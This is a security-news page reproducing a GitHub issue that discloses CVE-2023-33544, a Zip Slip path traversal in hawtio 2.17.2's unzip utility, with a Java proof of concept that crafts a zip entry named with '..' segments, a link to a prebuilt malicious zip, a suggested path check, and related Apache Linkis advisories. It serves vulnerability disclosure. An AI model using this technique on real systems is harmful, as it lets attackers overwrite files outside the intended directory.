Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2023-33544: Path Traversal when unzip zip file · Issue #2832 · hawtio/hawtio

hawtio 2.17.2 is vulnerable to Path Traversal. it is possible to input malicious zip files, which can result in the high-risk files after decompression being stored in any location, even leading to file overwrite.

CVE
#apache#git#java#maven

Description

In the method “unzip” (line 111) of the file

public static void unzip(InputStream in, File toDir) throws IOException {

, it is possible to input malicious zip files, which can result in the high-risk files after decompression being stored in any location, even leading to file overwrite and other situations.Proof of Concept

I use a maven project import the utility in pom.xml.

<dependency> <groupId>io.hawt</groupId> <artifactId>hawtio-util</artifactId> <version>2.17.2</version> </dependency>

Use the following zip() method to create a zip file from a txt file, and the name of the compressed file will be renamed to "…\a\b\c\poc.txt". (You should create this path firstly)
Then call the Zips.unzip() method, originally intended to unzip the file to "D:\project\TestProject\ICFuzzTest\testData\unzip", but it will eventually be extracted to its another directory "D:\project\TestProject\ICFuzzTest\a\b\c\poc.txt".
This may cause the original file to be overwritten by a high-risk file.

import io.hawt.util.Zips;

import java.io.File; import java.io.FileInputStream; import java.io.FileOutputStream; import java.io.IOException; import java.io.InputStream; import java.util.zip.ZipEntry; import java.util.zip.ZipOutputStream;

/** * 在Hawtio中存在unZip方法,可能有路径穿越的问题 */ public class HawtioUnzip {

//https://github.com/hawtio/hawtio/blob/268bca24c61c88c76ea661533514082954e38ed5/hawtio-util/src/main/java/io/hawt/util/Zips.java#L111 public static void main(String[] args) throws IOException { zip(); // create a poc

    String zipFile = "D:\\\\project\\\\TestProject\\\\ICFuzzTest\\\\testData\\\\unzip\\\\poc.zip";
    String destination = "D:\\\\project\\\\TestProject\\\\ICFuzzTest\\\\testData\\\\unzip";
    InputStream in = new FileInputStream(zipFile);
    Zips.unzip(in, new File(destination));
}

// create a poc
public static void zip() {
    ZipOutputStream zos = null;
    try {
        zos = new ZipOutputStream(new FileOutputStream(
                "D:\\\\project\\\\TestProject\\\\ICFuzzTest\\\\testData\\\\unzip\\\\poc.zip"));
        String srcFile = "..\\\\..\\\\a\\\\b\\\\c\\\\poc.txt";  // the next filePath
        String destFile = "D:\\\\project\\\\TestProject\\\\ICFuzzTest\\\\testData\\\\unzip\\\\poc.txt";
        zos.putNextEntry(new ZipEntry(srcFile));
        FileInputStream in = new FileInputStream(destFile);
        int len;
        byte\[\] buf = new byte\[1024\];
        while ((len = in.read(buf)) != -1) {
            zos.write(buf, 0, len);
        }
        zos.closeEntry();
        in.close();
    } catch (Exception e) {
        throw new RuntimeException("zip error from ZipUtils", e);
    } finally {
        if (zos != null) {
            try {
                zos.close();
            } catch (IOException e) {
                e.printStackTrace();
            }
        }
    }
}

}

The following is the constructed zip file:

https://github.com/Zlase0820/VulnData/blob/main/src.main/data/poc.zip

Suggestion

I think we can add a simple verification check on the path to avoid this issue. We can refer to other verification methods for unzip under Apache, such as:

https://github.com/apache/druid/blob/master/processing/src/main/java/org/apache/druid/utils/CompressionUtils.java#L242

He has the same error,and fixed in CVE-2023-27603.

Related news

GHSA-pj5j-w7mw-w797: Apache Linkis Zip Slip issue

In Apache Linkis <=1.3.1, due to the Manager module engineConn material upload does not check the zip path, This is a Zip Slip issue, which will lead to a potential RCE vulnerability. We recommend users upgrade the version of Linkis to version 1.3.2.

GHSA-p223-c4w6-q454: hawtio vulnerable to Path Traversal

hawtio 2.17.2 is vulnerable to Path Traversal. it is possible to input malicious zip files, which can result in the high-risk files after decompression being stored in any location, even leading to file overwrite.

CVE-2023-27603

In Apache Linkis <=1.3.1, due to the Manager module engineConn material upload does not check the zip path, This is a Zip Slip issue, which will lead to a potential RCE vulnerability. We recommend users upgrade the version of Linkis to version 1.3.2.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907